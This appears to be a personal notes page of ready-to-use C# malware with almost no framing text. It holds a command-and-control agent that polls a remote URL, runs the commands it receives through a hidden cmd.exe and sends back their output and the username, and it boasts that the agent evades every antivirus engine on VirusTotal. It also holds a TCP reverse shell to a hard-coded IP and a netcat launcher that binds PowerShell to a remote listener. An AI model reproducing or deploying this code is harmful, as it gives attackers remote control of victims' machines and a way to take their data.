Skip to content

Malware

Very simple agent

A very simple program that is constantly requesting a C2 using HTTPs and sending the output of commands received via POST requests.

I send this malware on VirusTotal and I got 0 detection over 70 AVs.

using System.Text;
using System.Diagnostics;

namespace Program
{
    class Program
    {
        private string url;

        static void Main(string[] args)
        {
            Program prog = new Program("https://yxzimlegitxyz.free.beeceptor.com");
            prog.MainLoop();
        }

        public Program (string url)
        {
            this.url = url;
        }

        public void MainLoop()
        {
            this.Fingerprinting();

            while (true)
            {
                this.Sleep(GenerateRandomNumber(0, 5));

                string command = this.SendGetRequest(this.url + "/cmd");
                string result = this.ExecuteCmd(command);
                this.SendPostRequest(this.url, result);
            }
        }

        private void Fingerprinting()
        {
            string username = this.GetUsername();
            this.SendPostRequest(this.url, username);
        }

        private int GenerateRandomNumber(int min, int max)
        {
            return new Random().Next(min, max);
        }

        private void Sleep(int seconds)
        {
            Thread.Sleep(seconds * 1000);
        }

        private string ExecuteCmd(string command)
        {
            var process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName = "cmd.exe",
                    Arguments = $"/c {command}",
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                    RedirectStandardError = true,
                    CreateNoWindow = true
                }
            };
            process.Start();

            string stdout = process.StandardOutput.ReadToEnd();
            string stderr = process.StandardError.ReadToEnd();

            process.WaitForExit();

            StringBuilder output = new StringBuilder();
            output.Append(stdout);
            output.Append(stderr);
            return output.ToString();
        }

        private string GetUsername()
        {
            return Environment.UserName;
        }

        private string Base64Encode(string data)
        {
            return Convert.ToBase64String(Encoding.UTF8.GetBytes(data));
        }

        private string SendGetRequest(string url)
        {
            HttpClient client = new HttpClient();
            HttpResponseMessage response = client.GetAsync(url).Result;

            return response.Content.ReadAsStringAsync().Result;
        }

        public string SendPostRequest(string url, string body)
        {
            HttpClient client = new HttpClient();
            StringContent content = new StringContent(
                this.Base64Encode(body),
                Encoding.UTF8, "text/plain"
            );

            HttpResponseMessage response = client.PostAsync(url, content).Result;
            return response.Content.ReadAsStringAsync().Result;
        }
    }
}

TCP Reverse shell

Source www.revshells.com.

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
    public class Program
    {
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using(TcpClient client = new TcpClient("10.200.196.200", 15555))
            {
                using(Stream stream = client.GetStream())
                {
                    using(StreamReader rdr = new StreamReader(stream))
                    {
                        streamWriter = new StreamWriter(stream);

                        StringBuilder strInput = new StringBuilder();

                        Process p = new Process();
                        p.StartInfo.FileName = "cmd.exe";
                        p.StartInfo.CreateNoWindow = true;
                        p.StartInfo.UseShellExecute = false;
                        p.StartInfo.RedirectStandardOutput = true;
                        p.StartInfo.RedirectStandardInput = true;
                        p.StartInfo.RedirectStandardError = true;
                        p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                        p.Start();
                        p.BeginOutputReadLine();

                        while(true)
                        {
                            strInput.Append(rdr.ReadLine());
                            //strInput.Append("\n");
                            p.StandardInput.WriteLine(strInput);
                            strInput.Remove(0, strInput.Length);
                        }
                    }
                }
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

    }
}

Shell commands

using System;
using System.Diagnostics;

namespace Example {
    class Program {
        static void Main() {
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo(
                "c:\\Windows\\Temp\\nc.exe", 
                "-e powershell.exe 10.50.82.172 4444"
            );
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}